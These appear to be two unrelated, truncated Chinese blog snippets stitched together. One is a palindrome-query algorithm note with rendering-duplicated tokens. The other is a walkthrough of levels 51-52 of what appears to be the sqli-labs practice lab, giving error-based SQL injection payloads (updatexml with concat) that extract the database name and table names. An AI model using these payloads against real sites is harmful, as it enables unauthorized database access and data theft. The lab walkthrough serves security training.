~~~~~~ Queries for Number of Palindromes ~~~~~ 总题单链接
思路 ~~~~~ 设 g [ L ] [ R ] g[L][R] g[L][R] 表示区间 [ L , R ] [L,R] [L,R] 是否为回文串。 ~~~~~ 预处理 g g g,枚举回文串的中点,从每个中点开始向两侧扩展,判断两端是…
第51关(报错注入 闭合) 查数据库
?sort1%27%20and%20updatexml(1,concat(1,database()),3)-- 查表
?sort1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schemasecurity)),1)-- 第52关…